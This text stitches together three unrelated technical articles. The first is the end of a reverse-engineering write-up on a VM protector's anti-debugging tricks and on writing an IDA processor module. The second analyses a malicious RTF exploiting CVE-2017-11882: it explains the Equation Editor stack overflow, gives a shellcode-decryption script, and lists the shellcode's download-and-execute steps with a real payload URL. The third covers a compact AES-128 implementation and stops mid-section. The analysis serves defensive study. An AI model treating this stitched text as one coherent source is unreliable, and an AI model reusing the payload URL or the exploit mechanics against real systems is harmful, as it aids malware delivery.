Another problem is, of course, that disassembly isn’t perfect, and you could end up with all sorts of bugs if you just blindly replace what you think is a reference to the IAT if it is instead just plain old data, for instance.

Another problem is functions which have merged tails. If a function with a shared exit path is stolen, there are going to be problems.

Another problem, discussed in a previous section, is the assumption that imports will always point to functions and not data. This a faulty assumption, and will cause many failures.

All of that being said, if one assumes perfect disassembly (which is possible manually via IDA and/or full debugging information) and allows a blacklist of imports which are data, then this is a working protection, one which I expect will be quite potent after a few generations. By no means is this a «fire and forget» packer like UPX, but it can be made to work on a case-by-case basis.

 Appendix A: Anti-Debugging Tricks

There are 53 anti-debug mechanisms and checks in the VM, 49 of which can be broken automatically with either a tiny IDC script patching the bytecode directly, or a small patch to the VM harness. Of the remaining four, there are two which I’ve never heard of before (although I don’t do this type of work often), so it’s worth checking it out in the IDB, but I won’t ruin the surprises here. I didn’t look too heavily into those which could be broken automatically, so some of those descriptions in the IDB may be incorrect.

You may notice conditional jump instructions in the IDB which don’t have their jump targets resolved, such as the following:

    ROM:01035E90    cmp     r07, 1
    ROM:01035E98    jz      77026DDFh

At first I figured my processor module was buggy, and that this instruction was supposed to transfer control to a keyed memory region which the processor module had failed to locate. After inspection of the raw bytecode and a close look at the relevant VM harness code, in fact, this instruction will move the VM EIP to the immediate value 0x77026DDF, which will cause a reading access violation or undefined behavior during the next VM cycle, depending upon whether that’s a valid address. Hence, jumps with unresolved targets are anti-debugging tricks. TheHyper confirmed this afterwards in private correspondence.

 Appendix B: IDA Processor Module Construction

The main difference between writing a simple disassembler and writing an IDA processor module is that, instead of printing the disassembly immediately and moving on to the next instruction, information about each individual instruction and operand must be retained for later analysis and display.

For example, according to this VM’s instruction encoding, 0x20 0x?[0-0xf] means «get flags into specified register». Whereas in a trivial disassembler one might write this:

    case 0x20:
        printf("%lx:  getefl %s\n", address, decode_register(next_byte & 0xf));
        return 2; // size of instruction

In an IDA processor module, one must write something like this (in ana.cpp):

    case 0x20:
        cmd.itype    = TH_getefl; // instruction code is TH_getefl; this comes
                                  // from an enumeration
        cmd.Op1.type = o_reg;     // operand 1 is register
        cmd.Op1.reg  = TH_Regnum(4, ua_next_byte() & 0xf); // get register num
        cmd.Op1.dtyp = dt_dword;  // register is dword size
        cmd.Op2.type = o_void;    // operands 2+ do not exist
        length = 2;               // instruction size is 2
        break;

TH_getefl is an element of an enum (ins.hpp), which in turn has a text representation and flags (ins.cpp). The operand information is eventually retrieved and printed (out.cpp):

    case o_reg:
        OutReg( x.reg );
        break;

Clearly, writing an IDA processor module is a significant amount of work compared to writing a simple disassembler, and in the case of small portions of straight-line VM code, the latter approach (via IDC) is preferable. However, in the case of large amounts of VM code with non-trivial control flow structure, the traditional advantages of IDA (cross-reference tracking, comment-ability, ability to name locations, creation and application of structures, and the ability to run scripts and existing plugins) really begin to shine.

 B.1 Logical and Physical Divisions of an IDA Processor Module

It should be noted that, as with all C++ source code, physical divisions are irrelevant as long as all references can be resolved at link-time; however, the layout presented herein is consistent with the processor modules released in the IDA SDK, and also with the included processor module. Coincidentally, this information is laid out in the same order as specified by Ilfak in %idasdk%\readme.txt:

    "  Usually I write a new processor module in the following way:
            - copy the sample module files to a new directory
            - first I edit INS.CPP and INS.HPP files
            - write the analyser ana.cpp
            - then outputter
            - and emulator (you can start with an almost empty emulator)
            - and describe the processor & assembler, write the notify() function"

It should also be noted that I have written only one processor module and am not an expert on the subject. This information presented is correct as far as I am aware, but should not be considered authoritative. When in doubt, consult the processor module sources in the IDA SDK, inquire on the DataRescue forums, ask Ilfak, and buy the SDK support plan as a last resort.

 B.2 Assigning Each Mnemonic a Numeric Code and Textual Representation

The files herein are solely responsible for defining the opcodes used by the processor, their mnemonics specifically, in both numeric and textual forms.

B.2.1 Ins.hpp

This file contains an enum, called «nameNum» by Ilfak, which assigns each opcode to a number. This enum contains a special, unused leading entry ([processor]_null, set to zero), and a trailing entry ([processor]_last) denoting the beginning and the end of the enum.

    enum nameNum 
    {
      TH_null = 0,    // Unknown Operation
      TH_mov,         // Move                
      [...,]          // [more instructions here]
      TH_stop,        // Stop execution, return to x86
      TH_end          // No more instructions
    };

B.2.2 Ins.cpp

This file is the counterpart to the corresponding header file, which contains an array of instruc_t structures, which consist of a const char * (the mnemonic’s textual description) and a flags dword. The entries in this array correspond numerically to the values given in the enum. The flags specify the number of operands the instruction uses/changes, whether the instruction is a call/switch jump, and whether to continue disassembling after this instruction is encountered (e.g. return instructions and unconditional jumps do not generally transmit control flow to the following instruction).

    instruc_t Instructions[] = {
      { "",                     0             },  // Unknown Operation
      
      // GROUP 1:  Two-Operand Arithmetic Instructions
      { "mov" ,   CF_USE2 | CF_USE1 | CF_CHG1 },  // Move
      [{...,...},]                                // [more instructions]
      { "stop"   ,                    CF_STOP }   // Stop execution, return to x86
    
    };

 

 B.3 Assigning Each Register a Numeric Code and Textual Representation

B.3.1 Reg.hpp

This file contains an enum, whose real entries begin at 0 (unlike previously- described enums with a bogus leading entry), consisting of the legal registers supported by the processor. As IDA takes into account the concept of segmentation, you will need to define fake code and data segment registers if your processor does not use them.

    enum TH_regs
    {
        rESPb = 0,
        rESPw,
        rESP,
        [...,]
        r0F,
        rVcs, // fake registers for segmentation
        rVds, // fake
        rEND
    };

B.3.2 [Processor].hpp This file contains an array of const char *s which map the elements of the enum described in the previous subsection to a textual representation thereof.

    static char *TH_regnames[] =
    {
        "rESPb",
        "rESPw",
        "rESP",
        [...,]
        "r0F"
    };

 

 B.4 Analyzing an Instruction And Filling IDA’s «cmd» Structure

The main disassembler function in an IDA processor module is called int ana() and lives in ana.cpp. This function takes no parameters, and instead retrieves the relevant bytes to decode via the functions ua_next_byte(), _word(), and _long().

This function, or collection of functions as the case may be, is responsible for:

  • Setting cmd.itype to the correct value from the nameNum enum described in section B.2.1.
  • Setting the fields of cmd.Op[1-6] to describe the types of operands (registers, immediates, addresses, etc.) used by this instruction.
  • Returning the length of the instruction.

An example from the included processor module:

    case 0x1d:
        cmd.itype     = TH_vfree;       // virtualalloc'ed memory free 
        cmd.Op1.type  = o_imm;          // type of operand 1 is immediate
        cmd.Op1.value = ua_next_long(); // value = memory key to free
        cmd.Op1.dtyp  = dt_dword;       // 4-byte memory key
        length = 5;                     // 5 bytes, 1 for opcode, 4 for operand
        break;

The cmd structure ties together the functions described in the next two sections: these functions do not take arguments, and instead retrieve information from the cmd structure in order to perform their duties.

 B.5 Displaying Operands

Out.cpp is responsible for providing two functions, bool outop( op_t & ) and void out(). out() is responsible for outputting the mnemonic and deciding whether to output the operands.

There’s a bit of subtlety here: processors which use conditional execution, for example ARM and the instruction MOVEH, may have a single nameNum/Instructions entry for an opcode («MOV»), and the logic for prepending «-EH» to the mnemonic exists in out(). I have not encountered this while coding a processor module and cannot speak about it.

One thing to notice about the code below is how gl_comm is set to 1 every time out() is called. If you do not do this, you will not see comments in the disassembly. Figuring this required an email to Ilfak. Frankly, it’s puzzling why displaying comments is not the default behavior, but this is the reality, so be sure to set this variable.

    void out( void )
    {
        char buf[MAXSTR];
        init_output_buffer(buf, sizeof(buf));
        OutMnem();
        
        if( cmd.Op1.type != o_void )
            out_one_operand( 0 );    // output first operand
        
        if( cmd.Op2.type != o_void ) // do we have a second operand?
        {
            out_symbol( ',' );       // put a ", " in the output
            OutChar( ' ' );
            out_one_operand( 1 );    // output second operand
        }
        
        term_output_buffer();
    
        // attach a possible user-defined comment to this instruction
        gl_comm = 1;
                                              
        MakeLine( buf );
    }

The other function, bool outop(op_t &), is responsible for translating the contents of the op_t structure it is given into a textual description of that operand. The structure of this function is a simple switch statement on the op_t.type field. This function should be written concurrently with ana().

The output takes place through a number of functions exported from ua.hpp in the SDK: these functions tend to begin with «Out» or «out_» (out_register, OutValue, out_keyword, out_symbol, etc).

All in all, coding this function is mainly trivial. Here’s one of the more complicated operand types from the included processor module:

    case o_displ:
        out_symbol('[');
        OutReg( x.phrase );
        out_symbol('+');
        OutValue(x, OOF_ADDR );
        out_symbol(']');
        break;

 

 B.6 Creating Cross-References

Most, but not all, instructions implicitly transfer control flow to the next instruction, and create no other cross-references. Some instructions like «ret» and «jmp» do not reference the next instruction. Other instructions, like «call» and conditional jumps, create additional references to the address(es) targeted. Still other instructions create references to data variables specified by immediate values.

This knowledge is not inherent in the depiction of the instruction set which has been developed thus far, and must be specified programatically. This is the responsibility of the int emu() function, which resides in emu.cpp, the smallest .cpp file in the supplied processor module.

    int emu( void )
    {
      ulong Feature = cmd.get_canon_feature();
    
      if((Feature & CF_STOP) == 0) // does this instruction pass flow on?
          ua_add_cref( 0, cmd.ea+cmd.size, fl_F ); // yes -- add a regular flow
    
      if(Feature & CF_USE1) // does this instruction have a first operand?
          TouchArg(cmd.Op1, 0); // process it 
    
      if(Feature & CF_USE2)
          TouchArg(cmd.Op2, 1);
    
      return 1; // return value seems to be unimportant
    }
    
    // "emulation" performed on a given op_t, see emu()
    static void TouchArg( op_t &x, bool bRead )
    {
        switch( x.type )
        {
        case o_vmmem:
            ua_add_cref( 0, get_keyed_address(x.addr), 
                         InstrIsSet(cmd.itype, CF_CALL) ? fl_CN : fl_JN);
            // add a code reference to the targeted address, either a call or a 
            // jump depending on whether that instruc_t's flags has CF_CALL set.
            break;
        }
    }

 

 B.7 Declaring IDA’s Relevant Processor Module Structures

The bulk of what remains is the creation of structures which are directly or indirectly exported by the processor module.

B.7.1 asm_t Structure

This structure defines an «assembler» which determines what the disassembly listing should look like. Specifically, what the syntax is for declaring data, origins, section boundaries, comments, strings, etc.

Since we don’t need to re-assemble virtual machine code (in the case of VMs found in protectors), the choices made here are immaterial, and this structure can be created once and re-used for all VM processor modules.

B.7.2 Function Begin and End Sequences

Both of these are optional. IDA employs both a linear-sweep and a flow-following method of disassembly: on the first pass, it marks all entrypoints as code, and then scans the raw bytes looking for the function begin sequences (such as push ebp / mov ebp, esp). These sequences can be specified in the processor module; however, when dealing with a throwaway VM, they aren’t so important, because you’re unlikely to know a priori what a function prologue looks like.

B.7.3 Processor Notification Event Handler

This is where my ignorance of processor module construction is most transparent. This function is called by the kernel upon certain events being triggered; such events include closing the database, opening an existing IDB, creating a new IDB, changing the processor module type, creating a new segment, and so on. A complete list of events can be found in idp.hpp.

For the creation of this processor module, I did not need to utilize many processor events, so I did not explore this further.

B.7.4 processor_t Structure

This is the «main» structure employed by the processor module, as plugin_t is the main structure employed by a plugin. In this structure, the pieces gathered in the previous sections are stitched together.

The processor module must know:

  • The numeric ID of the processor module (custom-defined).
  • The long and short name of the processor module. I.e. metapc and pc respectively. There’s an important point here which isn’t documented: the makefile has a line called «DESCRIPTION» which MUST be in the format «[long name]:[short name]». Failure to ensure this means that the processor module will not be shown in the list of valid processor modules. Without knowing this, you’ll be mailing Ilfak for advice, like I did.
  • The assembler(s) available. We’ll only need the one we defined in B.7.1.
  • A function pointer to int ana() (see B.4).
  • A function pointer to int emu() (see B.6).
  • A function pointer to void out() and bool outop(op_t &) (see B.5).
  • A function pointer to int notify(processor_t::idp_notify, …) (see B.7.3).
  • The number of registers, and a pointer to the const char * array of register names (both laid out in B.3).
  • The function begin and end sequences described in B.7.2. We can set these to NULL.
  • The number of mnemonics, and a pointer to the instruc_t array of mnemonic names (both laid out in B.2).

 

 Appendix C: Obligatory Greets

TheHyper: Very innovative, good work! You keep making them, I’ll keep breaking them.

blorght and Zen: Two of my favorite people, with or without the charming accents. Way too talented and more than a step or two over the edge. Stay just the way you are: I love both of you.

Nicholas Brulez: My bro the PE killer 🙂 I hope we get to meet up again soon. I don’t have to tell you to keep kicking ass, mate.

Neural Noise: One of my best friends, and a very gracious host. I can’t wait to meet up again in the world’s most alluring mafia-run slum that is Napoli (what a crazy city!). You bring the beautiful women, and I’ll bring my bummy self, and we can have panic attacks in traffic waititng for the party to start ;-). Stay cool, man! 🙂

Solar Eclipse: Congrats on the Pietrek thing!

spoonm: Thanks for the crash space and the informed conversation, and I’m looking forward to see what you publish next, too.

Pedram: For being the modern-day Fravia of OpenRCE and editing this tripe.

Rossi: For the much-needed proofreading.

lin0xx: Calm down!

LeetNet, kw, and upb: Self-explanatory.

Skape: For uninformed and for rocking.

Finally, to all true friends everywhere: I couldn’t do it without you.

CVE-2017–11882 RTF — Full description

Two weeks ago a malicious MS Word document was blocked from a sandbox (SHA 256 — 1aca3bcf3f303624b8d7bcf7ba7ce284cf06b0ca304782180b6b9b973f4ffdd7).The sample looked interesting because by that time, VirusTotal had a limited detection rate. Both VirusTotal and Any.Run identified the sample as CVE-2017–11882, one of the infamous Equation Editor exploits. Let’s take a look.

Looking for an OLE

RTF is a quite complex structure by it self. On top of that, adversaries add additional obfuscation layers to prevent both analysts and various analysis tools to detect the malicious objects.

RTF Hide & Seek

Firing up oletools/rtfobj and Didier’s rtdump, looking for OLE objects did not result to anything useful.

rtfdump.py

No OLE objects detected to rtfdump
rtfobj

You can find a list about RTF obfuscation in the links below:

Unfortunately those didn’t help to find an OLE object, so we just looked for “d0cf” (OLE Compound header identifier) where one instance came up

One OLE object instance identified

Analyzing the OLE

Apparently this OLE object has a CLSID of “0002ce02–0000–0000-c000–000000000046” which indicates that the OLE object is related to Equation Editor and to the exploit itself. Additionally one OLE Native Stream was identified (instead of an Equation Native stream).

CLSID related to Equation Editor
OLE CLSID
OLE Native Stream

How OLE Native Stream is related? Cofense has posted a relevant article.

The OLENativeStream is an OLE2.0 stream object contained within an OLE Compound File Storage (MS-CFB) object and contains only one header field, a 4-byte NativeDataSize field

Return to stack

The native stream is 0x795 (1945)bytes long. After that offset the actual content follows. One can guess, that the next 4 bytes, starting from 02 AB 01 E7 are related to Equation Editor MTEF header (given that no Equation Native Stream exists). You can find a good analysis of MTEF here. The header consists of 5 bytes, where the first one should be 0x03. Apparently the MTEF header does not play an important role (Or not?). In addition, there are two extra bytes (0xA, 0x1) which do not map on the MTEF specification. If anyone knows how to interpret those bytes please illuminate me.

Shellcode map

The most important part is the Font Record which have an ID of 0x8 and two one byte identifiers, one for typeface number an one for style (0x9D and 0x7C respectively). Following this byte sequence, the actual font name follows. Font name is stored in a buffer of 40 bytes length; 8 more are needed in order to overwrite the return address, which in our case is 0x00402157. This address belongs to a ret instruction in EQNEDT32.exe

It is well known, that this specific exploit is a stack-based buffer overflow. Our bet is that after the ret instruction, the execution returns to our shellcode. Let’s fire up Windbg.

Windbg return to stack

Prior to the ret instruction the last element in stack is our shellcode (0x0018f354). After the ret command this value will be popped to eip. We can see in the disassembly windows that we have a very clean shellcode.

Analyzing the shellcode

In order to analyze the shellcode I used shellcode2exe and fired IDA. The first call is the 0x004667b0 which is the import address of GlobalLock function call in EQNEDT32.exe which locks our shellcode in memory.

Following a sequence of jmp instructions, we end up in a xor decryption loop. The xor decryption takes place in 0x3FE offset for 0x389 length. In order to help us with the decryption, a small IDA Python script was created (forgive any Python mistakes, Python n00b here). The script can be executed by selecting the desired offset and typing run() in console line in IDA.

from binascii import hexlify
import struct
import ctypes
from ctypes import *
def run():
 startPos = 0x4013fe
 xored = 0
 index = 0
 for index in range (startPos,startPos + 0x389, 4):
  xored = xored * 0x22A76047
  xored = xored + 0x2698B12D
  for i in range (0,4):
   patched_byte = ord(struct.pack('<I',c_uint(xored).value)[i]) ^ Byte(index+i)
   PatchByte(index+i, patched_byte)

After the execution of the script, a URL appeared, therefore something good happened to us.

Bytes before and after the decryption

In the decryption loop the is a call in sub_40147e which before the decryption was meaningless, as the jmp destination was out of range.

Before the decryption

However the same function, after the decryption is totally different. You can observe a lot of dynamic call instructions, which one can bet that they are function pointers resolved by GetProcAddress

After the decryption

In order not to make the post huge and being lazy enough to continue static analysis, Windbg came into the scene. Apparently what the shellcode does, can be summarized in the following steps:

  • ExpandEnvironmentStringsW(“%APPDATA%\wwindowss.exe”,dst_path)
  • URLDownloadToFileW(“ http://reggiewaller.com/404/ac/ppre.exe”,dst_path)
  • CreateProcessW(“C:\Users\vmuser\AppData\Roaming\wwindowss.exe”)
  • ExitProcess

That’s all folks! This post and any following ones are simply a notepad, which document some basic analysis steps. Any comments or corrections are more than welcome.

In the above we presented an analysis of a malicious RTF detected by a sandbox. The RTF was exploiting the CVE-2017–11882. We tried to analyze the RTF, extracted the shellcode and analyzed it. The shellcode is a plain download & execute shellcode.

AES-128 Block Cipher

Introduction

In January 1997, the National Institute of Standards and Technology (NIST) initiated a process to replace the Data Encryption Standard (DES) published in 1977. A draft criteria to evaluate potential algorithms was published, and members of the public were invited to provide feedback. The finalized criteria was published in September 1997 which outlined a minimum acceptable requirement for each submission.

4 years later in November 2001, Rijndael by Belgian Cryptographers Vincent Rijmen and Joan Daemen which we now refer to as the Advanced Encryption Standard (AES), was announced as the winner.

Since publication, implementations of AES have frequently been optimized for speed. Code which executes the quickest has traditionally taken priority over how much ROM it uses. Developers will use lookup tables to accelerate each step of the encryption process, thus compact implementations are rarely if ever sought after.

Our challenge here is to implement AES in the least amount of C and more specifically x86 assembly code. It will obviously result in a slow implementation, and will not be resistant to side-channel analysis, although the latter problem can likely be resolved using conditional move instructions (CMOVcc) if necessary.

AES Parameters

There are three different set of parameters available, with the main difference related to key length. Our implementation will be AES-128 which fits perfectly onto a 32-bit architecture

.

Key Length
(Nk words)
Block Size
(Nb words)
Number of Rounds
(Nr)
AES-128 4 4 10
AES-192 6 4 12
AES-256 8 4 14

Structure of AES

Two IF statements are introduced in order to perform the encryption in one loop. What isn’t included in the illustration below is ExpandRoundKey and AddRoundConstantwhich generate round keys.

The first layout here is what we normally see used when describing AES. The second introduces 2 conditional statements which makes the code more compact.

Source in C

The optimizers built into C compilers can sometimes reveal more efficient ways to implement a piece of code. At the very least, they will show you alternative ways to write some code in assembly.

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned char B;
typedef unsigned W;

// Multiplication over GF(2**8)
W M(W x){
    W t=x&0x80808080;
    return((x^t)*2)^((t>>7)*27);
}
// SubByte
B S(B x){
    B i,y,c;
    if(x){
      for(c=i=0,y=1;--i;y=(!c&&y==x)?c=1:y,y^=M(y));
      x=y;F(4)x^=y=(y<<1)|(y>>7);
    }
    return x^99;
}
void E(B *s){
    W i,w,x[8],c=1,*k=(W*)&x[4];
    
    // copy plain text + master key to x
    F(8)x[i]=((W*)s)[i];
    
    for(;;){
      // 1st part of ExpandRoundKey, AddRoundKey and update state
      w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];
      
      // 2nd part of ExpandRoundKey
      w=R(w,8)^c;F(4)w=k[i]^=w;      
      
      // if round 11, stop else update c
      if(c==108)break;c=M(c);      
      
      // SubBytes and ShiftRows
      F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(s[i]);
      
      // if not round 10, MixColumns
      if(c!=108)F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
    }
}

x86 Overview

Some x86 registers have special purposes, and it’s important to know this when writing compact code.

Register Description Used by
eax Accumulator lods, stos, scas, xlat, mul, div
ebx Base xlat
ecx Count loop, rep (conditional suffixes E/Z and NE/NZ)
edx Data cdq, mul, div
esi Source Index lods, movs, cmps
edi Destination Index stos, movs, scas, cmps
ebp Base Pointer enter, leave
esp Stack Pointer pushad, popad, push, pop, call, enter, leave

Those of you familiar with the x86 architecture will know certain instructions have dependencies or affect the state of other registers after execution. For example, LODSB will load a byte from memory pointer in SI to AL before incrementing SI by 1. STOSB will store a byte in AL to memory pointer in DI before incrementing DI by 1. MOVSB will move a byte from memory pointer in SI to memory pointer in DI, before adding 1 to both SI and DI. If the same instruction is preceded REP (for repeat) then this also affects the CX register, decreasing by 1.

Initialization

The s parameter points to a 32-byte buffer containing a 16-byte plain text and 16-byte master key which is copied to the local buffer x.

A copy of the data is required, because both will be modified during the encryption process. ESI will point to swhile EDI will point to x

EAX will hold Rcon value declared as c. ECX will be used exclusively for loops, and EDX is a spare register for loops which require an index starting position of zero. There’s a reason to prefer EAX than other registers. Byte comparisons are only 2 bytes for AL, while 3 for others.

// 2 vs 3 bytes
  /* 0001 */ "\x3c\x6c"             /* cmp al, 0x6c         */
  /* 0003 */ "\x80\xfb\x6c"         /* cmp bl, 0x6c         */
  /* 0006 */ "\x80\xf9\x6c"         /* cmp cl, 0x6c         */
  /* 0009 */ "\x80\xfa\x6c"         /* cmp dl, 0x6c         */

In addition to this, one operation requires saving EAX in another register, which only requires 1 byte with XCHG. Other registers would require 2 bytes

// 1 vs 2 bytes
  /* 0001 */ "\x92"                 /* xchg edx, eax        */
  /* 0002 */ "\x87\xd3"             /* xchg ebx, edx        */

Setting EAX to 1, our loop counter ECX to 4, and EDX to 0 can be accomplished in a variety of ways requiring only 7 bytes. The alternative for setting EAX here would be : XOR EAX, EAX; INC EAX

// 7 bytes
  /* 0001 */ "\x6a\x01"             /* push 0x1             */
  /* 0003 */ "\x58"                 /* pop eax              */
  /* 0004 */ "\x6a\x04"             /* push 0x4             */
  /* 0006 */ "\x59"                 /* pop ecx              */
  /* 0007 */ "\x99"                 /* cdq                  */

Another way …

// 7 bytes
  /* 0001 */ "\x31\xc9"             /* xor ecx, ecx         */
  /* 0003 */ "\xf7\xe1"             /* mul ecx              */
  /* 0005 */ "\x40"                 /* inc eax              */
  /* 0006 */ "\xb1\x04"             /* mov cl, 0x4          */

And another..

// 7 bytes
  /* 0000 */ "\x6a\x01"             /* push 0x1             */
  /* 0002 */ "\x58"                 /* pop eax              */
  /* 0003 */ "\x99"                 /* cdq                  */
  /* 0004 */ "\x6b\xc8\x04"         /* imul ecx, eax, 0x4   */

ESI will point to s which contains our plain text and master key. ESI is normally reserved for read operations. We can load a byte with LODS into AL/EAX, and move values from ESI to EDI using MOVS.

Typically we see stack allocation using ADD or SUB, and sometimes (very rarely) using ENTER. This implementation only requires 32-bytes of stack space, and PUSHAD which saves 8 general purpose registers on the stack is exactly 32-bytes of memory, executed in 1 byte opcode.

To illustrate why it makes more sense to use PUSHAD/POPAD instead of ADD/SUB or ENTER/LEAVE, the following are x86 opcodes generated by assembler.

// 5 bytes
  /* 0000 */ "\xc8\x20\x00\x00" /* enter 0x20, 0x0 */
  /* 0004 */ "\xc9"             /* leave           */
  
// 6 bytes
  /* 0000 */ "\x83\xec\x20"     /* sub esp, 0x20   */
  /* 0003 */ "\x83\xc4\x20"     /* add esp, 0x20   */
  
// 2 bytes
  /* 0000 */ "\x60"             /* pushad          */
  /* 0001 */ "\x61"             /* popad           */

Obviously the 2-byte example is better here, but once you require more than 96-bytes, usually ADD/SUB in combination with a register is the better option.

; *****************************
; void E(void *s);
; *****************************
_E:
    pushad
    xor    ecx, ecx           ; ecx = 0
    mul    ecx                ; eax = 0, edx = 0
    inc    eax                ; c = 1
    mov    cl, 4
    pushad                    ; alloca(32)
; F(8)x[i]=((W*)s)[i];
    mov    esi, [esp+64+4]    ; esi = s
    mov    edi, esp
    pushad
    add    ecx, ecx           ; copy state + master key to stack
    rep    movsd
    popad

Multiplication

A pointer to this function is stored in EBP, and there are three reasons to use EBP over other registers:

  1. EBP has no 8-bit registers, so we can’t use it for any 8-bit operations.
  2. Indirect memory access requires 1 byte more for index zero.
  3. The only instructions that use EBP are ENTER and LEAVE.
// 2 vs 3 bytes for indirect access  
  /* 0001 */ "\x8b\x5d\x00"         /* mov ebx, [ebp]       */
  /* 0004 */ "\x8b\x1e"             /* mov ebx, [esi]       */

When writing compact code, EBP is useful only as a temporary register or pointer to some function.

; *****************************
; Multiplication over GF(2**8)
; *****************************
    call   $+21               ; save address      
    push   ecx                ; save ecx
    mov    cl, 4              ; 4 bytes
    add    al, al             ; al <<= 1
    jnc    $+4                ;
    xor    al, 27             ;
    ror    eax, 8             ; rotate for next byte
    loop   $-9                ; 
    pop    ecx                ; restore ecx
    ret
    pop    ebp

SubByte

In the SubBytes step, each byte a_{i,j} in the state matrix is replaced with S(a_{i,j}) using an 8-bit substitution box. The S-box is derived from the multiplicative inverse over GF(2^8), and we can implement SubByte purely using code.

; *****************************
; B SubByte(B x)
; *****************************
sub_byte:  
    pushad 
    test   al, al            ; if(x){
    jz     sb_l6
    xchg   eax, edx
    mov    cl, -1            ; i=255 
; for(c=i=0,y=1;--i;y=(!c&&y==x)?c=1:y,y^=M(y));
sb_l0:
    mov    al, 1             ; y=1
sb_l1:
    test   ah, ah            ; !c
    jnz    sb_l2    
    cmp    al, dl            ; y!=x
    setz   ah
    jz     sb_l0
sb_l2:
    mov    dh, al            ; y^=M(y)
    call   ebp               ;
    xor    al, dh
    loop   sb_l1             ; --i
; F(4)x^=y=(y<<1)|(y>>7);
    mov    dl, al            ; dl=y
    mov    cl, 4             ; i=4  
sb_l5:
    rol    dl, 1             ; y=R(y,1)
    xor    al, dl            ; x^=y
    loop   sb_l5             ; i--
sb_l6:
    xor    al, 99            ; return x^99
    mov    [esp+28], al
    popad
    ret

AddRoundKey

The state matrix is combined with a subkey using the bitwise XOR operation. This step known as Key Whitening was inspired by the mathematician Ron Rivest, who in 1984 applied a similar technique to the Data Encryption Standard (DES) and called it DESX.

; *****************************
; AddRoundKey
; *****************************
; F(4)s[i]=x[i]^k[i];
    pushad
    xchg   esi, edi           ; swap x and s
xor_key:
    lodsd                     ; eax = x[i]
    xor    eax, [edi+16]      ; eax ^= k[i]
    stosd                     ; s[i] = eax
    loop   xor_key
    popad

AddRoundConstant

There are various cryptographic attacks possible against AES without this small, but important step. It protects against the Slide Attack, first described in 1999 by David Wagner and Alex Biryukov. Without different round constants to generate round keys, all the round keys will be the same.

; *****************************
; AddRoundConstant
; *****************************
; *k^=c; c=M(c);
    xor    [esi+16], al
    call   ebp

ExpandRoundKey

The operation to expand the master key into subkeys for each round of encryption isn’t normally in-lined. To boost performance, these round keys are precomputed before the encryption process since you would only waste CPU cycles repeating the same computation which is unnecessary.

Compacting the AES code into a single call requires in-lining the key expansion operation. The C code here is not directly translated into x86 assembly, but the assembly does produce the same result.

; ***************************
; ExpandRoundKey
; ***************************
; F(4)w<<=8,w|=S(((B*)k)[15-i]);w=R(w,8);F(4)w=k[i]^=w;
    pushad
    add    esi,16
    mov    eax, [esi+3*4]    ; w=k[3]
    ror    eax, 8            ; w=R(w,8)
exp_l1:
    call   S                 ; w=S(w)
    ror    eax, 8            ; w=R(w,8);
    loop   exp_l1
    mov    cl, 4
exp_l2:
    xor    [esi], eax        ; k[i]^=w
    lodsd                    ; w=k[i]
    loop   exp_l2
    popad

Combining the steps

An earlier version of the code used separate AddRoundKeyAddRoundConstant, and ExpandRoundKey, but since these steps all relate to using and updating the round key, the 3 steps are combined in order to reduce the number of loops, thus shaving off a few bytes.

; *****************************
; AddRoundKey, AddRoundConstant, ExpandRoundKey
; *****************************
; w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];
; w=R(w,8)^c;F(4)w=k[i]^=w;
    pushad
    xchg   eax, edx
    xchg   esi, edi
    mov    eax, [esi+16+12]  ; w=R(k[3],8);
    ror    eax, 8
xor_key:
    mov    ebx, [esi+16]     ; t=k[i];
    xor    [esi], ebx        ; x[i]^=t;
    movsd                    ; s[i]=x[i];
; w=(w&-256)|S(w)
    call   sub_byte          ; al=S(al);
    ror    eax, 8            ; w=R(w,8);
    loop   xor_key
; w=R(w,8)^c;
    xor    eax, edx          ; w^=c;
; F(4)w=k[i]^=w;
    mov    cl, 4
exp_key:
    xor    [esi], eax        ; k[i]^=w;
    lodsd                    ; w=k[i];
    loop   exp_key
    popad

Shifting Rows

ShiftRows cyclically shifts the bytes in each row of the state matrix by a certain offset. The first row is left unchanged. Each byte of the second row is shifted one to the left, with the third and fourth rows shifted by two and three respectively.

Because it doesn’t matter about the order of SubBytes and ShiftRows, they’re combined in one loop.

; ***************************
; ShiftRows and SubBytes
; ***************************
; F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(((B*)s)[i]);
    pushad
    mov    cl, 16
shift_rows:
    lodsb                    ; al = S(s[i])
    call   sub_byte
    push   edx
    mov    ebx, edx          ; ebx = i%4
    and    ebx, 3            ;
    shr    edx, 2            ; (i/4 - ebx) % 4
    sub    edx, ebx          ; 
    and    edx, 3            ; 
    lea    ebx, [ebx+edx*4]  ; ebx = (ebx+edx*4)
    mov    [edi+ebx], al     ; x[ebx] = al
    pop    edx
    inc    edx
    loop   shift_rows
    popad

Mixing Columns

The MixColumns transformation along with ShiftRows are the main source of diffusion. Each column is treated as a four-term polynomial b(x)=b_{3}x^{3}+b_{2}x^{2}+b_{1}x+b_{0}, where the coefficients are elements over {GF} (2^{8}), and is then multiplied modulo x^{4}+1 with a fixed polynomial a(x)=3x^{3}+x^{2}+x+2

; *****************************
; MixColumns
; *****************************
; F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
    pushad
mix_cols:
    mov    eax, [edi]        ; w0 = x[i];
    mov    ebx, eax          ; w1 = w0;
    ror    eax, 8            ; w0 = R(w0,8);
    mov    edx, eax          ; w2 = w0;
    xor    eax, ebx          ; w0^= w1;
    call   ebp               ; w0 = M(w0);
    xor    eax, edx          ; w0^= w2;
    ror    ebx, 16           ; w1 = R(w1,16);
    xor    eax, ebx          ; w0^= w1;
    ror    ebx, 8            ; w1 = R(w1,8);
    xor    eax, ebx          ; w0^= w1;
    stosd                    ; x[i] = w0;
    loop   mix_cols
    popad
    jmp    enc_main

Counter Mode (CTR)

Block ciphers should never be used in Electronic Code Book (ECB) mode, and the ECB Penguin illustrates why.

 

 

 

 

 

 

As you can see, blocks of the same data using the same key result in the exact same ciphertexts, which is why modes of encryption were invented. Galois/Counter Mode (GCM) is authenticated encryption which uses Counter (CTR) mode to provide confidentiality.

